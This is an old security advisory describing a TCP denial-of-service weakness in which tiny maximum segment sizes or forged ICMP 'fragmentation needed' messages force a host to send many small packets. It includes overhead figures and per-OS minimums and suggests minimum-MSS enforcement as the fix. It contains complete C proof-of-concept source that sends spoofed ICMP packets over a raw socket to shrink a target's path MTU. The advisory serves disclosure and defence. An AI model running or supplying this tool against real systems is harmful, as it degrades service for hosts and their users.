|
Vulnerability TCP/IP Affected most systems Description Darren Reed found following. On a lan far far away, a rouge packet was heading towards a server, ready to start up a new storm ... If any of you have tested what happens to the ability of a box to perform well when it has a small MTU you will know that setting the MTU to (say) 56 on a diskless thing is a VERY VERY bad idea when NFS read/write packets are generally 8k in size. Do not try it on a NFS thing unless you plan to reboot it, ok ? Last time Darren did this was when he worked out you could fragment packets inside the TCP header and that lesson was enough for him. Following on from this, it occurs to me that the problem with the above can possibly be reproduced with TCP. How? That thing called "maximum segment size". The problem? Well, the first is that there does not appear to be a minimum. The second is that it is negoiated by the caller, not callee. Did we hear someone say "oh dear"? What's this mean? Well, if we connect to www.microsoft.com and set our MSS to 143 (say), they need to send us 11 packets for every one they would normally send us (with an MSS of 1436). Total output for them is 1876 bytes - a 30% increase. However, that's not the real problem. Our experience is that hosts, especially PC's, have a lot of trouble handling *LOTS* of interrupts. To send 2k out via the network, it's no longer 2 packets but 20+ - a significant increase in the workload. A quick table (based on 20byte IP & TCP header): datalen mss packets total bytes bytes %increase 1436 1436 1 1476 0 1436 1024 2 1516 3% 1436 768 2 1516 3% 1436 512 3 1556 5% 1436 256 6 1676 13% 1436 128 12 1916 30% 1436 64 23 2356 69% 1436 32 45 3236 119% 1426 28 52 3516 238% (MTU = 68) 1436 16 90 5036 241% 1436 8 180 8636 485% 1436 1 1436 58876 3989% For Solaris, you can enforce a more sane minimum MSS than the install default (1) with ndd: ndd -set /dev/tcp tcp_mss_min 128 HP-UX 11.* is in the same basket as Solaris. *BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD at 64. (OpenBSD's comment on this says 32 but the code says 64). Linux 2.4 is 88 We can't see anything in the registry or MSDN which says what it is for Windows. By experimentation, Win2000 appears to be 88, NT 4 appears to be 1 Nothing else besides Solaris seems to have anything close to a reasonable manner in which to tune the minimum value. What's most surprising is that there does not appear to be a documented minimum, just as there is no "minimum MTU" size for IP. If there is, please correct us. About the only bonus to this is that there does not appear to be an easy way to affect the MSS sent in the initial SYN packet. Oh, so how's this a potential denial of service attack? Generally network efficiency comes through sending lots of large packets... but don't tell ATM folks that, of course. Does it work? *shrug* It is not easy to test...the only testing Darren could do (with NetBSD) was to use the TCP_MAXSEG setsockopt BUT this only affects the sending MSS (now what use is that?), but in testing, changing it from the default 1460 to 1 caused number of packets to go from 9 to 2260 to write 1436 bytes of data to discard. To send 100 * 1436 from the NetBSD box to Solaris8 took 60 seconds (MSS of 1) vs ~1 with an MSS of 1460. Of even more significance, one connection like this made almost no difference after the first run but running a second saw kernel CPU jump to 30% on an SS20/712 (we suspect there are some serious TCP tuning happening dynamically). The sending host was likewise afflicted with a signifcant CPU usage penalty if more than one was running. There were some very surprising things happening too - with just one session active, ~170-200pps were seen with netstat on Solaris, but with the second, it was between 1750 and 1850pps. Can you say "ACK storm"? Oh, and for fun you can enable TCP timestamping just to make those headers bigger and run the system a bit harder whilst processing packets! Darren didn't investigated the impact of ICMP PMTU discovery, but from his reading of at least the BSD source code, the MTU for the route will be ignored if it is less than the default MSS when sending out the TCP SYN with the MSS option. That aside, it will still impact current connections and would appear to be a way to force the _current_ MSS below that set at connect time. On BSD, it will not accept PMTU updates if the MTU is less than 296, on Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm, allows you to get an effective MSS of less than 88). /* * (C)Copyright 2001 Darren Reed. * * maxseg.c */ #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #if BSD >= 199306 #include <sys/sysctl.h> #endif #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/ip_var.h> #include <netinet/tcp.h> #include <netinet/tcp_timer.h> #include <netinet/tcp_var.h> #include <time.h> #include <fcntl.h> #include <errno.h> void prepare_icmp(struct sockaddr_in *); void primedefaultmss(int, int); u_short in_cksum(u_short *, int); int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *); #define NEW_MSS 512 #define NEW_MTU 1500 static int start_mtu = NEW_MTU; void primedefaultmss(fd, mss) int fd, mss; { #ifdef __NetBSD__ static int defaultmss = 0; int mib[4], msso, mssn; size_t olen; if (mss == 0) mss = defaultmss; mssn = mss; olen = sizeof(msso); mib[0] = CTL_NET; mib[1] = AF_INET; mib[2] = IPPROTO_TCP; mib[3] = TCPCTL_MSSDFLT; if (sysctl(mib, 4, &msso, &olen, NULL, 0)) err(1, "sysctl"); if (defaultmss == 0) defaultmss = msso; if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn))) err(1, "sysctl"); if (sysctl(mib, 4, &mssn, &olen, NULL, 0)) err(1, "sysctl"); printf("Default MSS: old %d new %d\n", msso, mssn); #endif #if HACKED_KERNEL int opt; if (mss) op = mss; else op = 512; if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op))) err(1, "setsockopt"); #endif } int main(int argc, char *argv[]) { struct sockaddr_in me, them; int fd, op, olen, mss; char prebuf[16374]; time_t now1, now2; struct timeval tv; mss = NEW_MSS; primedefaultmss(-1, mss); fd = socket(AF_INET, SOCK_STREAM, 0); if (fd == -1) err(1, "socket"); memset((char *)&them, 0, sizeof(me)); them.sin_family = AF_INET; them.sin_port = ntohs(atoi(argv[2])); them.sin_addr.s_addr = inet_addr(argv[1]); primedefaultmss(fd, mss); op = fcntl(fd, F_GETFL, 0); if (op != -1) { op |= O_NONBLOCK; fcntl(fd, F_SETFL, op); } op = 1; (void) setsockopt(fd, SOL_SOCKET, TCP_NODELAY, &op, sizeof(op)); if (connect(fd, (struct sockaddr *)&them, sizeof(them)) && (errno != EINPROGRESS)) err(1, "connect"); olen = sizeof(op); if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen)) printf("Remote mss %d\n", op); else err(1, "getsockopt"); #if HACKED_KERNEL olen = sizeof(op); if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen)) printf("Our mss %d\n", op); else err(1, "getsockopt(+1)"); #endif olen = sizeof(me); if (getsockname(fd, (struct sockaddr *)&me, &olen)) err(1, "getsockname"); (void) read(fd, prebuf, sizeof(prebuf)); now1 = time(NULL); for (op = 2; op; op--) { icmp_unreach(&me, &them); olen = read(fd, prebuf, sizeof(prebuf)); if (olen == -1) { if (errno == ENOBUFS || errno == EAGAIN || errno == EWOULDBLOCK) { tv.tv_sec = 0; tv.tv_usec = 10000; select(3, NULL, NULL, NULL, &tv); continue; } warn("read"); break; } } now2 = time(NULL); printf("Elapsed time %d\n", now2 - now1); primedefaultmss(fd, 0); close(fd); return 0; } /* * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying */ static char icmpbuf[256]; static int icmpsock = -1; static struct sockaddr_in destsock; void prepare_icmp(dst) struct sockaddr_in *dst; { struct tcphdr *tcp; struct icmp *icmp; icmp = (struct icmp *)icmpbuf; if (icmpsock == -1) { memset((char *)&destsock, 0, sizeof(destsock)); destsock.sin_family = AF_INET; destsock.sin_addr = dst->sin_addr; srand(getpid()); icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); if (icmpsock == -1) err(1, "socket"); /* the following messy stuff from Adam Glass (icmpsquish.c) */ memset(icmp, 0, sizeof(struct icmp) + 8); icmp->icmp_type = ICMP_UNREACH; icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; icmp->icmp_pmvoid = 0; icmp->icmp_ip.ip_v = IPVERSION; icmp->icmp_ip.ip_hl = 5; icmp->icmp_ip.ip_len = htons(NEW_MSS); icmp->icmp_ip.ip_p = IPPROTO_TCP; icmp->icmp_ip.ip_off = htons(IP_DF); icmp->icmp_ip.ip_ttl = 11 + (rand() % 50); icmp->icmp_ip.ip_id = rand() & 0xffff; icmp->icmp_ip.ip_src = dst->sin_addr; tcp = (struct tcphdr *)(&icmp->icmp_ip + 1); tcp->th_sport = dst->sin_port; } icmp->icmp_nextmtu = htons(start_mtu); icmp->icmp_cksum = 0; } u_short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), * we add sequential 16 bit words to it, and at the end, fold * back all the carry bits from the top 16 bits into the lower * 16 bits. */ while( nleft > 1 ) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if( nleft == 1 ) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* * add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } int icmp_unreach(src, dst) struct sockaddr_in *src, *dst; { static int donecksum = 0; struct sockaddr_in dest; struct tcphdr *tcp; struct icmp *icmp; int i, rc; u_short sum; icmp = (struct icmp *)icmpbuf; prepare_icmp(dst); icmp->icmp_ip.ip_dst = src->sin_addr; sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip)); icmp->icmp_ip.ip_sum = sum; tcp = (struct tcphdr *)(&icmp->icmp_ip + 1); tcp->th_dport = src->sin_port; sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8); icmp->icmp_cksum = sum; start_mtu /= 2; if (start_mtu < 69) start_mtu = 69; i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0, (struct sockaddr *)&destsock, sizeof(destsock)); if (i == -1 && errno != ENOBUFS && errno != EAGAIN && errno != EWOULDBLOCK) err(1, "sendto"); return(0); } Some people are not understanding the difference between the TCP MSS and IP's MTU. Either that or both you and David LeBlanc are grasping at straws in order to make WindowsNT look better. MTU and Path MTU (PMTU) discovery are not the same as TCP's MSS but they can and do impact it. Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1 (sent lots of data packets out that had 1 byte of data) and he got Win2000 to accept an MTU of 69 (effective MSS of 17 after TCP options) through PMTU discovery. Now, if 20+68 is the reason why 88 is the minimum MSS Win2000 will accept then someone doesn't understand what the word "MTU" means because it referes to the TOTAL IP datagram length, not the data part. Using the C program above one is able to get Win2000 to create a MTU specific path to a local box where the MTU was 69. That's well under any number over 500 (depending on how you choose to see the value). Path MTU discovery has absolutely no interaction with the TCP MSS except that one would expect it to be used if a cached path already existed to a host, with an MTU specific for it set, when initiating or accepting a new TCP connection. Solution Quite clearly the host operating system needs to set a much more sane minimum MSS than 1. Given there is no minimum MTU for IP - well, maybe "68" - it's hard to derive what it should be. Anything below 40 should just be banned (that's the point at which you're transmitting 50% data, 50% headers). Most of the defaults, above, are chosen because it fits in well with their internal network buffering (some use a default MSS of 512 rather than 536 for similar reasons). But above that, what do you choose? 80 for a 25/75 or something higher still? Whatever the choice and however it is calculated, it is not enough to just enforce it when the MSS option is received. It also needs to be enforced when the MTU parameter is checked in ICMP "need frag" packets.